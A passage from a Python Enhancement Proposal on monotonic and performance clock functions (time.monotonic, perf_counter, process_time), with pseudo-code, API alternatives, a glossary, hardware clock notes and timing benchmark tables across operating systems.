The time.clock() function is deprecated because it is not +portable: it behaves differently depending on the operating system. +time.perf_counter() or time.process_time() should be used +instead, depending on your requirements. time.clock() is marked as +deprecated but is not planned for removal.

+

Limitations:

+
    +
  • The behaviour of clocks after a system suspend is not defined in the +documentation of new functions. The behaviour depends on the +operating system: see the Monotonic Clocks section below. Some +recent operating systems provide two clocks, one including time +elapsed during system suspend, one not including this time. Most +operating systems only provide one kind of clock.
  • +
  • time.monotonic() and time.perf_counter() may or may not be adjusted. +For example, CLOCK_MONOTONIC is slewed on Linux, whereas +GetTickCount() is not adjusted on Windows. +time.get_clock_info('monotonic')['adjustable'] can be used to check +if the monotonic clock is adjustable or not.
  • +
  • No time.thread_time() function is proposed by this PEP because it is +not needed by Python standard library nor a common asked feature. +Such function would only be available on Windows and Linux. On +Linux, it is possible to use +time.clock_gettime(CLOCK_THREAD_CPUTIME_ID). On Windows, ctypes or +another module can be used to call the GetThreadTimes() +function.
  • +
+
+
+

Python functions

+
+

New Functions

+
+

time.get_clock_info(name)

+

Get information on the specified clock. Supported clock names:

+
    +
  • "clock": time.clock()
  • +
  • "monotonic": time.monotonic()
  • +
  • "perf_counter": time.perf_counter()
  • +
  • "process_time": time.process_time()
  • +
  • "time": time.time()
  • +
+

Return a time.clock_info object which has the following attributes:

+
    +
  • implementation (str): name of the underlying operating system +function. Examples: "QueryPerformanceCounter()", +"clock_gettime(CLOCK_REALTIME)".
  • +
  • monotonic (bool): True if the clock cannot go backward.
  • +
  • adjustable (bool): True if the clock can be changed automatically +(e.g. by a NTP daemon) or manually by the system administrator, False +otherwise
  • +
  • resolution (float): resolution in seconds of the clock.
  • +
+
+
+

time.monotonic()

+

Monotonic clock, i.e. cannot go backward. It is not affected by system +clock updates. The reference point of the returned value is +undefined, so that only the difference between the results of +consecutive calls is valid and is a number of seconds.

+

On Windows versions older than Vista, time.monotonic() detects +GetTickCount() integer overflow (32 bits, roll-over after 49.7 +days). It increases an internal epoch (reference time by) 232 each time that an overflow is detected. The epoch is stored +in the process-local state and so +the value of time.monotonic() may be different in two Python +processes running for more than 49 days. On more recent versions of +Windows and on other operating systems, time.monotonic() is +system-wide.

+

Availability: Windows, Mac OS X, Linux, FreeBSD, OpenBSD, Solaris. +Not available on GNU/Hurd.

+

Pseudo-code [2]:

+
if os.name == 'nt':
+    # GetTickCount64() requires Windows Vista, Server 2008 or later
+    if hasattr(_time, 'GetTickCount64'):
+        def monotonic():
+            return _time.GetTickCount64() * 1e-3
+    else:
+        def monotonic():
+            ticks = _time.GetTickCount()
+            if ticks < monotonic.last:
+                # Integer overflow detected
+                monotonic.delta += 2**32
+            monotonic.last = ticks
+            return (ticks + monotonic.delta) * 1e-3
+        monotonic.last = 0
+        monotonic.delta = 0
+
+elif sys.platform == 'darwin':
+    def monotonic():
+        if monotonic.factor is None:
+            factor = _time.mach_timebase_info()
+            monotonic.factor = timebase[0] / timebase[1] * 1e-9
+        return _time.mach_absolute_time() * monotonic.factor
+    monotonic.factor = None
+
+elif hasattr(time, "clock_gettime") and hasattr(time, "CLOCK_HIGHRES"):
+    def monotonic():
+        return time.clock_gettime(time.CLOCK_HIGHRES)
+
+elif hasattr(time, "clock_gettime") and hasattr(time, "CLOCK_MONOTONIC"):
+    def monotonic():
+        return time.clock_gettime(time.CLOCK_MONOTONIC)
+
+
+

On Windows, QueryPerformanceCounter() is not used even though it +has a better resolution than GetTickCount(). It is not reliable +and has too many issues.

+
+
+

time.perf_counter()

+

Performance counter with the highest available resolution to measure a +short duration. It does include time elapsed during sleep and is +system-wide. The reference point of the returned value is undefined, +so that only the difference between the results of consecutive calls +is valid and is a number of seconds.

+

It is available on all platforms.

+

Pseudo-code:

+
if os.name == 'nt':
+    def _win_perf_counter():
+        if _win_perf_counter.frequency is None:
+            _win_perf_counter.frequency = _time.QueryPerformanceFrequency()
+        return _time.QueryPerformanceCounter() / _win_perf_counter.frequency
+    _win_perf_counter.frequency = None
+
+def perf_counter():
+    if perf_counter.use_performance_counter:
+        try:
+            return _win_perf_counter()
+        except OSError:
+            # QueryPerformanceFrequency() fails if the installed
+            # hardware does not support a high-resolution performance
+            # counter
+            perf_counter.use_performance_counter = False
+    if perf_counter.use_monotonic:
+        # The monotonic clock is preferred over the system time
+        try:
+            return time.monotonic()
+        except OSError:
+            perf_counter.use_monotonic = False
+    return time.time()
+perf_counter.use_performance_counter = (os.name == 'nt')
+perf_counter.use_monotonic = hasattr(time, 'monotonic')
+
+
+
+
+

time.process_time()

+

Sum of the system and user CPU time of the current process. It does +not include time elapsed during sleep. It is process-wide by +definition. The reference point of the returned value is undefined, +so that only the difference between the results of consecutive calls +is valid.

+

It is available on all platforms.

+

Pseudo-code [2]:

+
if os.name == 'nt':
+    def process_time():
+        handle = _time.GetCurrentProcess()
+        process_times = _time.GetProcessTimes(handle)
+        return (process_times['UserTime'] + process_times['KernelTime']) * 1e-7
+else:
+    try:
+        import resource
+    except ImportError:
+        has_resource = False
+    else:
+        has_resource = True
+
+    def process_time():
+        if process_time.clock_id is not None:
+            try:
+                return time.clock_gettime(process_time.clock_id)
+            except OSError:
+                process_time.clock_id = None
+        if process_time.use_getrusage:
+            try:
+                usage = resource.getrusage(resource.RUSAGE_SELF)
+                return usage[0] + usage[1]
+            except OSError:
+                process_time.use_getrusage = False
+        if process_time.use_times:
+            try:
+                times = _time.times()
+                cpu_time = times.tms_utime + times.tms_stime
+                return cpu_time / process_time.ticks_per_seconds
+            except OSError:
+                process_time.use_getrusage = False
+        return _time.clock()
+    if (hasattr(time, 'clock_gettime')
+        and hasattr(time, 'CLOCK_PROF')):
+        process_time.clock_id = time.CLOCK_PROF
+    elif (hasattr(time, 'clock_gettime')
+          and hasattr(time, 'CLOCK_PROCESS_CPUTIME_ID')):
+        process_time.clock_id = time.CLOCK_PROCESS_CPUTIME_ID
+    else:
+        process_time.clock_id = None
+    process_time.use_getrusage = has_resource
+    process_time.use_times = hasattr(_time, 'times')
+    if process_time.use_times:
+        # sysconf("SC_CLK_TCK"), or the HZ constant, or 60
+        process_time.ticks_per_seconds = _times.ticks_per_seconds
+
+
+
+
+
+

Existing Functions

+
+

time.time()

+

The system time which is usually the civil time. It is system-wide by +definition. It can be set manually by the system administrator or +automatically by a NTP daemon.

+

It is available on all platforms and cannot fail.

+

Pseudo-code [2]:

+
if os.name == "nt":
+    def time():
+        return _time.GetSystemTimeAsFileTime()
+else:
+    def time():
+        if hasattr(time, "clock_gettime"):
+            try:
+                return time.clock_gettime(time.CLOCK_REALTIME)
+            except OSError:
+                # CLOCK_REALTIME is not supported (unlikely)
+                pass
+        if hasattr(_time, "gettimeofday"):
+            try:
+                return _time.gettimeofday()
+            except OSError:
+                # gettimeofday() should not fail
+                pass
+        if hasattr(_time, "ftime"):
+            return _time.ftime()
+        else:
+            return _time.time()
+
+
+
+
+

time.sleep()

+

Suspend execution for the given number of seconds. The actual +suspension time may be less than that requested because any caught +signal will terminate the time.sleep() following execution of that +signal’s catching routine. Also, the suspension time may be longer +than requested by an arbitrary amount because of the scheduling of +other activity in the system.

+

Pseudo-code [2]:

+
try:
+    import select
+except ImportError:
+    has_select = False
+else:
+    has_select = hasattr(select, "select")
+
+if has_select:
+    def sleep(seconds):
+        return select.select([], [], [], seconds)
+
+elif hasattr(_time, "delay"):
+    def sleep(seconds):
+        milliseconds = int(seconds * 1000)
+        _time.delay(milliseconds)
+
+elif os.name == "nt":
+    def sleep(seconds):
+        milliseconds = int(seconds * 1000)
+        win32api.ResetEvent(hInterruptEvent);
+        win32api.WaitForSingleObject(sleep.sigint_event, milliseconds)
+
+    sleep.sigint_event = win32api.CreateEvent(NULL, TRUE, FALSE, FALSE)
+    # SetEvent(sleep.sigint_event) will be called by the signal handler of SIGINT
+
+elif os.name == "os2":
+    def sleep(seconds):
+        milliseconds = int(seconds * 1000)
+        DosSleep(milliseconds)
+
+else:
+    def sleep(seconds):
+        seconds = int(seconds)
+        _time.sleep(seconds)
+
+
+
+
+
+

Deprecated Function

+
+

time.clock()

+

On Unix, return the current processor time as a floating point number +expressed in seconds. It is process-wide by definition. The resolution, +and in fact the very definition of the meaning of “processor time”, +depends on that of the C function of the same name, but in any case, +this is the function to use for benchmarking Python or timing +algorithms.

+

On Windows, this function returns wall-clock seconds elapsed since the +first call to this function, as a floating point number, based on the +Win32 function QueryPerformanceCounter(). The resolution is +typically better than one microsecond. It is system-wide.

+

Pseudo-code [2]:

+
if os.name == 'nt':
+    def clock():
+        try:
+            return _win_perf_counter()
+        except OSError:
+            # QueryPerformanceFrequency() fails if the installed
+            # hardware does not support a high-resolution performance
+            # counter
+            pass
+        return _time.clock()
+else:
+    clock = _time.clock
+
+
+
+
+
+
+

Alternatives: API design

+
+

Other names for time.monotonic()

+
    +
  • time.counter()
  • +
  • time.metronomic()
  • +
  • time.seconds()
  • +
  • time.steady(): “steady” is ambiguous: it means different things to +different people. For example, on Linux, CLOCK_MONOTONIC is +adjusted. If we uses the real time as the reference clock, we may +say that CLOCK_MONOTONIC is steady. But CLOCK_MONOTONIC gets +suspended on system suspend, whereas real time includes any time +spent in suspend.
  • +
  • time.timeout_clock()
  • +
  • time.wallclock(): time.monotonic() is not the system time aka the +“wall clock”, but a monotonic clock with an unspecified starting +point.
  • +
+

The name “time.try_monotonic()” was also proposed for an older +version of time.monotonic() which would fall back to the system +time when no monotonic clock was available.

+
+
+

Other names for time.perf_counter()

+
    +
  • time.high_precision()
  • +
  • time.highres()
  • +
  • time.hires()
  • +
  • time.performance_counter()
  • +
  • time.timer()
  • +
+
+
+

Only expose operating system clocks

+

To not have to define high-level clocks, which is a difficult task, a +simpler approach is to only expose operating system clocks. +time.clock_gettime() and related clock identifiers were already added +to Python 3.3 for example.

+
+
+

time.monotonic(): Fallback to system time

+

If no monotonic clock is available, time.monotonic() falls back to the +system time.

+

Issues:

+
    +
  • It is hard to define such a function correctly in the documentation: +is it monotonic? Is it steady? Is it adjusted?
  • +
  • Some users want to decide what to do when no monotonic clock is +available: use another clock, display an error, or do something +else.
  • +
+

Different APIs were proposed to define such function.

+
+

One function with a flag: time.monotonic(fallback=True)

+
    +
  • time.monotonic(fallback=True) falls back to the system time if no +monotonic clock is available or if the monotonic clock failed.
  • +
  • time.monotonic(fallback=False) raises OSError if monotonic clock +fails and NotImplementedError if the system does not provide a +monotonic clock
  • +
+

A keyword argument that gets passed as a constant in the caller is +usually poor API.

+

Raising NotImplementedError for a function is something uncommon in +Python and should be avoided.

+
+
+

One time.monotonic() function, no flag

+

time.monotonic() returns (time: float, is_monotonic: bool).

+

An alternative is to use a function attribute: +time.monotonic.is_monotonic. The attribute value would be None before +the first call to time.monotonic().

+
+
+
+

Choosing the clock from a list of constraints

+

The PEP as proposed offers a few new clocks, but their guarantees +are deliberately loose in order to offer useful clocks on different +platforms. This inherently embeds policy in the calls, and the +caller must thus choose a policy.

+

The “choose a clock” approach suggests an additional API to let +callers implement their own policy if necessary +by making most platform clocks available and letting the caller pick amongst them. +The PEP’s suggested clocks are still expected to be available for the common +simple use cases.

+

To do this two facilities are needed: +an enumeration of clocks, and metadata on the clocks to enable the user to +evaluate their suitability.

+

The primary interface is a function make simple choices easy: +the caller can use time.get_clock(*flags) with some combination of flags. +This includes at least:

+
    +
  • time.MONOTONIC: clock cannot go backward
  • +
  • time.STEADY: clock rate is steady
  • +
  • time.ADJUSTED: clock may be adjusted, for example by NTP
  • +
  • time.HIGHRES: clock with the highest resolution
  • +
+

It returns a clock object with a .now() method returning the current time. +The clock object is annotated with metadata describing the clock feature set; +its .flags field will contain at least all the requested flags.

+

time.get_clock() returns None if no matching clock is found and so calls can +be chained using the or operator. Example of a simple policy decision:

+
T = get_clock(MONOTONIC) or get_clock(STEADY) or get_clock()
+t = T.now()
+
+
+

The available clocks always at least include a wrapper for time.time(), +so a final call with no flags can always be used to obtain a working clock.

+

Examples of flags of system clocks:

+
    +
  • QueryPerformanceCounter: MONOTONIC | HIGHRES
  • +
  • GetTickCount: MONOTONIC | STEADY
  • +
  • CLOCK_MONOTONIC: MONOTONIC | STEADY (or only MONOTONIC on Linux)
  • +
  • CLOCK_MONOTONIC_RAW: MONOTONIC | STEADY
  • +
  • gettimeofday(): (no flag)
  • +
+

The clock objects contain other metadata including the clock flags +with additional feature flags above those listed above, the name +of the underlying OS facility, and clock precisions.

+

time.get_clock() still chooses a single clock; an enumeration +facility is also required. +The most obvious method is to offer time.get_clocks() with the +same signature as time.get_clock(), but returning a sequence +of all clocks matching the requested flags. +Requesting no flags would thus enumerate all available clocks, +allowing the caller to make an arbitrary choice amongst them based +on their metadata.

+

Example partial implementation: +clockutils.py.

+
+
+

Working around operating system bugs?

+

Should Python ensure that a monotonic clock is truly +monotonic by computing the maximum with the clock value and the +previous value?

+

Since it’s relatively straightforward to cache the last value returned +using a static variable, it might be interesting to use this to make +sure that the values returned are indeed monotonic.

+
    +
  • Virtual machines provide less reliable clocks.
  • +
  • QueryPerformanceCounter() has known bugs (only one is not fixed yet)
  • +
+

Python may only work around a specific known operating system bug: +KB274323 contains a code example to workaround the bug (use +GetTickCount() to detect QueryPerformanceCounter() leap).

+

Issues with “correcting” non-monotonicities:

+
    +
  • if the clock is accidentally set forward by an hour and then back +again, you wouldn’t have a useful clock for an hour
  • +
  • the cache is not shared between processes so different processes +wouldn’t see the same clock value
  • +
+
+
+
+

Glossary

+
+
Accuracy:
+
The amount of deviation of measurements by a given instrument from +true values. See also Accuracy and precision. +Inaccuracy in clocks may be caused by lack of precision, drift, or an +incorrect initial setting of the clock (e.g., timing of threads is +inherently inaccurate because perfect synchronization in resetting +counters is quite difficult).
+
Adjusted:
+
Resetting a clock to the correct time. This may be done either +with a <Step> or by <Slewing>.
+
Civil Time:
+
Time of day; external to the system. 10:45:13am is a Civil time; +45 seconds is not. Provided by existing function +time.localtime() and time.gmtime(). Not changed by this +PEP.
+
Clock:
+
An instrument for measuring time. Different clocks have different +characteristics; for example, a clock with nanosecond +<precision> may start to <drift> after a few minutes, while a less +precise clock remained accurate for days. This PEP is primarily +concerned with clocks which use a unit of seconds.
+
Counter:
+
A clock which increments each time a certain event occurs. A +counter is strictly monotonic, but not a monotonic clock. It can +be used to generate a unique (and ordered) timestamp, but these +timestamps cannot be mapped to <civil time>; tick creation may well +be bursty, with several advances in the same millisecond followed +by several days without any advance.
+
CPU Time:
+
A measure of how much CPU effort has been spent on a certain task. +CPU seconds are often normalized (so that a variable number can +occur in the same actual second). CPU seconds can be important +when profiling, but they do not map directly to user response time, +nor are they directly comparable to (real time) seconds.
+
Drift:
+
The accumulated error against “true” time, as defined externally to +the system. Drift may be due to imprecision, or to a difference +between the average rate at which clock time advances and that of +real time.
+
Epoch:
+
The reference point of a clock. For clocks providing <civil time>, +this is often midnight as the day (and year) rolled over to January +1, 1970. For a <clock_monotonic> clock, the epoch may be undefined +(represented as None).
+
Latency:
+
Delay. By the time a clock call returns, the <real time> has +advanced, possibly by more than the precision of the clock.
+
Monotonic:
+
The characteristics expected of a monotonic clock in practice. +Moving in at most one direction; for clocks, that direction is +forward. The <clock> should also be <steady>, and should be +convertible to a unit of seconds. The tradeoffs often include lack +of a defined <epoch> or mapping to <Civil Time>.
+
Precision:
+
The amount of deviation among measurements of the same physical +value by a single instrument. Imprecision in clocks may be caused by +a fluctuation of the rate at which clock time advances relative to +real time, including clock adjustment by slewing.
+
Process Time:
+
Time elapsed since the process began. It is typically measured in +<CPU time> rather than <real time>, and typically does not advance +while the process is suspended.
+
Real Time:
+
Time in the real world. This differs from <Civil time> in that it +is not <adjusted>, but they should otherwise advance in lockstep. +It is not related to the “real time” of “Real Time [Operating] +Systems”. It is sometimes called “wall clock time” to avoid that +ambiguity; unfortunately, that introduces different ambiguities.
+
Resolution:
+
The smallest difference between two physical values that results +in a different measurement by a given instrument.
+
Slew:
+
A slight change to a clock’s speed, usually intended to correct +<drift> with respect to an external authority.
+
Stability:
+
Persistence of accuracy. A measure of expected <drift>.
+
Steady:
+
A clock with high <stability> and relatively high <accuracy> and +<precision>. In practice, it is often used to indicate a +<clock_monotonic> clock, but places greater emphasis on the +consistency of the duration between subsequent ticks.
+
Step:
+
An instantaneous change in the represented time. Instead of +speeding or slowing the clock (<slew>), a single offset is +permanently added.
+
System Time:
+
Time as represented by the Operating System.
+
Thread Time:
+
Time elapsed since the thread began. It is typically measured in +<CPU time> rather than <real time>, and typically does not advance +while the thread is idle.
+
Wallclock:
+
What the clock on the wall says. This is typically used as a +synonym for <real time>; unfortunately, wall time is itself +ambiguous.
+
+
+
+

Hardware clocks

+
+

List of hardware clocks

+
    +
  • HPET: A High Precision Event Timer (HPET) chip consists of a 64-bit +up-counter (main counter) counting at least at 10 MHz and a set of +up to 256 comparators (at least 3). Each HPET can have up to 32 +timers. HPET can cause around 3 seconds of drift per day.
  • +
  • TSC (Time Stamp Counter): Historically, the TSC increased with every +internal processor clock cycle, but now the rate is usually constant +(even if the processor changes frequency) and usually equals the +maximum processor frequency. Multiple cores have different TSC +values. Hibernation of system will reset TSC value. The RDTSC +instruction can be used to read this counter. CPU frequency scaling +for power saving.
  • +
  • ACPI Power Management Timer: ACPI 24-bit timer with a frequency of +3.5 MHz (3,579,545 Hz).
  • +
  • Cyclone: The Cyclone timer uses a 32-bit counter on IBM Extended +X-Architecture (EXA) chipsets which include computers that use the +IBM “Summit” series chipsets (ex: x440). This is available in IA32 +and IA64 architectures.
  • +
  • PIT (programmable interrupt timer): Intel 8253/8254 chipsets with a +configurable frequency in range 18.2 Hz - 1.2 MHz. It uses a 16-bit +counter.
  • +
  • RTC (Real-time clock). Most RTCs use a crystal oscillator with a +frequency of 32,768 Hz.
  • +
+
+
+

Linux clocksource

+

There were 4 implementations of the time in the Linux kernel: UTIME +(1996), timer wheel (1997), HRT (2001) and hrtimers (2007). The +latter is the result of the “high-res-timers” project started by +George Anzinger in 2001, with contributions by Thomas Gleixner and +Douglas Niehaus. The hrtimers implementation was merged into Linux +2.6.21, released in 2007.

+

hrtimers supports various clock sources. It sets a priority to each +source to decide which one will be used. Linux supports the following +clock sources:

+
    +
  • tsc
  • +
  • hpet
  • +
  • pit
  • +
  • pmtmr: ACPI Power Management Timer
  • +
  • cyclone
  • +
+

High-resolution timers are not supported on all hardware +architectures. They are at least provided on x86/x86_64, ARM and +PowerPC.

+

clock_getres() returns 1 nanosecond for CLOCK_REALTIME and +CLOCK_MONOTONIC regardless of underlying clock source. Read Re: +clock_getres() and real resolution from Thomas Gleixner (9 Feb +2012) for an explanation.

+

The /sys/devices/system/clocksource/clocksource0 directory +contains two useful files:

+
    +
  • available_clocksource: list of available clock sources
  • +
  • current_clocksource: clock source currently used. It is +possible to change the current clocksource by writing the name of a +clocksource into this file.
  • +
+

/proc/timer_list contains the list of all hardware timers.

+

Read also the time(7) manual page: +“overview of time and timers”.

+
+
+

FreeBSD timecounter

+

kern.timecounter.choice lists available hardware clocks with their +priority. The sysctl program can be used to change the timecounter. +Example:

+
# dmesg | grep Timecounter
+Timecounter "i8254" frequency 1193182 Hz quality 0
+Timecounter "ACPI-safe" frequency 3579545 Hz quality 850
+Timecounter "HPET" frequency 100000000 Hz quality 900
+Timecounter "TSC" frequency 3411154800 Hz quality 800
+Timecounters tick every 10.000 msec
+# sysctl kern.timecounter.choice
+kern.timecounter.choice: TSC(800) HPET(900) ACPI-safe(850) i8254(0) dummy(-1000000)
+# sysctl kern.timecounter.hardware="ACPI-fast"
+kern.timecounter.hardware: HPET -> ACPI-fast
+
+
+

Available clocks:

+
    +
  • “TSC”: Time Stamp Counter of the processor
  • +
  • “HPET”: High Precision Event Timer
  • +
  • “ACPI-fast”: ACPI Power Management timer (fast mode)
  • +
  • “ACPI-safe”: ACPI Power Management timer (safe mode)
  • +
  • “i8254”: PIT with Intel 8254 chipset
  • +
+

The commit 222222 (May +2011) decreased ACPI-fast timecounter quality to 900 and increased +HPET timecounter quality to 950: “HPET on modern platforms usually +have better resolution and lower latency than ACPI timer”.

+

Read Timecounters: Efficient and precise timekeeping in SMP kernels by Poul-Henning Kamp +(2002) for the FreeBSD Project.

+
+
+

Performance

+

Reading a hardware clock has a cost. The following table compares +the performance of different hardware clocks on Linux 3.3 with Intel +Core i7-2600 at 3.40GHz (8 cores). The bench_time.c program +was used to fill these tables.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
FunctionTSCACPI PMHPET
time()2 ns2 ns2 ns
CLOCK_REALTIME_COARSE10 ns10 ns10 ns
CLOCK_MONOTONIC_COARSE12 ns13 ns12 ns
CLOCK_THREAD_CPUTIME_ID134 ns135 ns135 ns
CLOCK_PROCESS_CPUTIME_ID127 ns129 ns129 ns
clock()146 ns146 ns143 ns
gettimeofday()23 ns726 ns637 ns
CLOCK_MONOTONIC_RAW31 ns716 ns607 ns
CLOCK_REALTIME27 ns707 ns629 ns
CLOCK_MONOTONIC27 ns723 ns635 ns
+

FreeBSD 8.0 in kvm with hardware virtualization:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
FunctionTSCACPI-SafeHPETi8254
time()191 ns188 ns189 ns188 ns
CLOCK_SECOND187 ns184 ns187 ns183 ns
CLOCK_REALTIME_FAST189 ns180 ns187 ns190 ns
CLOCK_UPTIME_FAST191 ns185 ns186 ns196 ns
CLOCK_MONOTONIC_FAST188 ns187 ns188 ns189 ns
CLOCK_THREAD_CPUTIME_ID208 ns206 ns207 ns220 ns
CLOCK_VIRTUAL280 ns279 ns283 ns296 ns
CLOCK_PROF289 ns280 ns282 ns286 ns
clock()342 ns340 ns337 ns344 ns
CLOCK_UPTIME_PRECISE197 ns10380 ns4402 ns4097 ns
CLOCK_REALTIME196 ns10376 ns4337 ns4054 ns
CLOCK_MONOTONIC_PRECISE198 ns10493 ns4413 ns3958 ns
CLOCK_UPTIME197 ns10523 ns4458 ns4058 ns
gettimeofday()202 ns10524 ns4186 ns3962 ns
CLOCK_REALTIME_PRECISE197 ns10599 ns4394 ns4060 ns
CLOCK_MONOTONIC201 ns10766 ns4498 ns3943 ns
+

Each function was called 100,000 times and CLOCK_MONOTONIC was used to +get the time before and after. The benchmark was run 5 times, keeping +the minimum time.

+
+
+
+

NTP adjustment

+

NTP has different methods to adjust a clock:

+
    +
  • “slewing”: change the clock frequency to be slightly faster or +slower (which is done with adjtime()). Since the slew rate is +limited to 0.5 millisecond per second, each second of adjustment requires an +amortization interval of 2000 seconds. Thus, an adjustment of many +seconds can take hours or days to amortize.
  • +
  • “stepping”: jump by a large amount in a single discrete step (which +is done with settimeofday())
  • +
+

By default, the time is slewed if the offset is less than 128 ms, but +stepped otherwise.

+

Slewing is generally desirable (i.e. we should use CLOCK_MONOTONIC, +not CLOCK_MONOTONIC_RAW) if one wishes to measure “real” time (and not +a time-like object like CPU cycles). This is because the clock on the +other end of the NTP connection from you is probably better at keeping +time: hopefully that thirty-five thousand dollars of Cesium +timekeeping goodness is doing something better than your PC’s $3 +quartz crystal, after all.

+

Get more detail in the documentation of the NTP daemon.

+
+
+

Operating system time functions

+
+

Monotonic Clocks

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameC ResolutionAdjustedInclude SleepInclude Suspend
gethrtime()1 nsNoYesYes
CLOCK_HIGHRES1 nsNoYesYes
CLOCK_MONOTONIC1 nsSlewed on LinuxYesNo
CLOCK_MONOTONIC_COARSE1 nsSlewed on LinuxYesNo
CLOCK_MONOTONIC_RAW1 nsNoYesNo
CLOCK_BOOTTIME1 ns?YesYes
CLOCK_UPTIME1 nsNoYes?
mach_absolute_time()1 nsNoYesNo
QueryPerformanceCounter()-NoYes?
GetTickCount[64]()1 msNoYesYes
timeGetTime()1 msNoYes?
+

The “C Resolution” column is the resolution of the underlying C +structure.

+

Examples of clock resolution on x86_64:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameOperating systemOS ResolutionPython Resolution
QueryPerformanceCounterWindows Seven10 ns10 ns
CLOCK_HIGHRESSunOS 5.112 ns265 ns
CLOCK_MONOTONICLinux 3.01 ns322 ns
CLOCK_MONOTONIC_RAWLinux 3.31 ns628 ns
CLOCK_BOOTTIMELinux 3.31 ns628 ns
mach_absolute_time()Mac OS 10.61 ns3 µs
CLOCK_MONOTONICFreeBSD 8.211 ns5 µs
CLOCK_MONOTONICOpenBSD 5.010 ms5 µs
CLOCK_UPTIMEFreeBSD 8.211 ns6 µs
CLOCK_MONOTONIC_COARSELinux 3.31 ms1 ms
CLOCK_MONOTONIC_COARSELinux 3.04 ms4 ms
GetTickCount64()Windows Seven16 ms15 ms
+

The “OS Resolution” is the resolution announced by the operating +system. +The “Python Resolution” is the smallest difference between two calls +to the time function computed in Python using the clock_resolution.py +program.

+
+

mach_absolute_time

+

Mac OS X provides a monotonic clock: mach_absolute_time(). It is +based on absolute elapsed time since system boot. It is not +adjusted and cannot be set.

+

mach_timebase_info() gives a fraction to convert the clock value to a number of +nanoseconds. See also the Technical Q&A QA1398.

+

mach_absolute_time() stops during a sleep on a PowerPC CPU, but not on +an Intel CPU: Different behaviour of mach_absolute_time() on i386/ppc.

+
+
+

CLOCK_MONOTONIC, CLOCK_MONOTONIC_RAW, CLOCK_BOOTTIME

+

CLOCK_MONOTONIC and CLOCK_MONOTONIC_RAW represent monotonic time since +some unspecified starting point. They cannot be set. The resolution +can be read using clock_getres().

+

Documentation: refer to the manual page of your operating system. +Examples:

+ +

CLOCK_MONOTONIC is available at least on the following operating +systems:

+
    +
  • DragonFly BSD, FreeBSD >= 5.0, OpenBSD, NetBSD
  • +
  • Linux
  • +
  • Solaris
  • +
+

The following operating systems don’t support CLOCK_MONOTONIC:

+ +

On Linux, NTP may adjust the CLOCK_MONOTONIC rate (slewed), but it cannot +jump backward.

+

CLOCK_MONOTONIC_RAW is specific to Linux. It is similar to +CLOCK_MONOTONIC, but provides access to a raw hardware-based time that +is not subject to NTP adjustments. CLOCK_MONOTONIC_RAW requires Linux +2.6.28 or later.

+

Linux 2.6.39 and glibc 2.14 introduces a new clock: CLOCK_BOOTTIME. +CLOCK_BOOTTIME is identical to CLOCK_MONOTONIC, except that it also +includes any time spent in suspend. Read also Waking systems from +suspend (March, 2011).

+

CLOCK_MONOTONIC stops while the machine is suspended.

+

Linux provides also CLOCK_MONOTONIC_COARSE since Linux 2.6.32. It is +similar to CLOCK_MONOTONIC, less precise but faster.

+

clock_gettime() fails if the system does not support the specified +clock, even if the standard C library supports it. For example, +CLOCK_MONOTONIC_RAW requires a kernel version 2.6.28 or later.

+
+
+

Windows: QueryPerformanceCounter

+

High-resolution performance counter. It is monotonic. +The frequency of the counter can be read using QueryPerformanceFrequency(). +The resolution is 1 / QueryPerformanceFrequency().

+

It has a much higher resolution, but has lower long term precision +than GetTickCount() and timeGetTime() clocks. For example, it will +drift compared to the low precision clocks.

+

Documentation:

+ +

Hardware clocks used by QueryPerformanceCounter:

+
    +
  • Windows XP: RDTSC instruction of Intel processors, the clock +frequency is the frequency of the processor (between 200 MHz and 3 +GHz, usually greater than 1 GHz nowadays).
  • +
  • Windows 2000: ACPI power management timer, frequency = 3,549,545 Hz. +It can be forced through the “/usepmtimer” flag in boot.ini.
  • +
+

QueryPerformanceFrequency() should only be called once: the frequency +will not change while the system is running. It fails if the +installed hardware does not support a high-resolution performance +counter.

+

QueryPerformanceCounter() cannot be adjusted: +SetSystemTimeAdjustment() +only adjusts the system time.

+

Bugs:

+
    +
  • The performance counter value may unexpectedly leap forward because +of a hardware bug, see KB274323.
  • +
  • On VirtualBox, QueryPerformanceCounter() does not increment the high +part every time the low part overflows, see Monotonic timers +(2009).
  • +
  • VirtualBox had a bug in its HPET virtualized device: +QueryPerformanceCounter() did jump forward by approx. 42 seconds (issue +#8707).
  • +
  • Windows XP had a bug (see KB896256): on a multiprocessor +computer, QueryPerformanceCounter() returned a different value for +each processor. The bug was fixed in Windows XP SP2.
  • +
  • Issues with processor with variable frequency: the frequency is +changed depending on the workload to reduce memory consumption.
  • +
  • Chromium don’t use QueryPerformanceCounter() on Athlon X2 CPUs +(model 15) because “QueryPerformanceCounter is unreliable” (see +base/time_win.cc in Chromium source code)
  • +
+
+
+

Windows: GetTickCount(), GetTickCount64()

+

GetTickCount() and GetTickCount64() are monotonic, cannot fail and are +not adjusted by SetSystemTimeAdjustment(). MSDN documentation: +GetTickCount(), +GetTickCount64(). +The resolution can be read using GetSystemTimeAdjustment().

+

The elapsed time retrieved by GetTickCount() or GetTickCount64() +includes time the system spends in sleep or hibernation.

+

GetTickCount64() was added to Windows Vista and Windows Server 2008.

+

It is possible to improve the precision using the undocumented +NtSetTimerResolution() function. +There are applications using this undocumented function, example: Timer +Resolution.

+

WaitForSingleObject() uses the same timer as GetTickCount() with the +same precision.

+
+
+

Windows: timeGetTime

+

The timeGetTime function retrieves the system time, in milliseconds. +The system time is the time elapsed since Windows was started. Read +the timeGetTime() documentation.

+

The return type of timeGetTime() is a 32-bit unsigned integer. As +GetTickCount(), timeGetTime() rolls over after 2^32 milliseconds (49.7 +days).

+

The elapsed time retrieved by timeGetTime() includes time the system +spends in sleep.

+

The default precision of the timeGetTime function can be five +milliseconds or more, depending on the machine.

+

timeBeginPeriod() can be used to increase the precision of +timeGetTime() up to 1 millisecond, but it negatively affects power +consumption. Calling timeBeginPeriod() also affects the granularity +of some other timing calls, such as CreateWaitableTimer(), +WaitForSingleObject() and Sleep().

+
+

Note

+

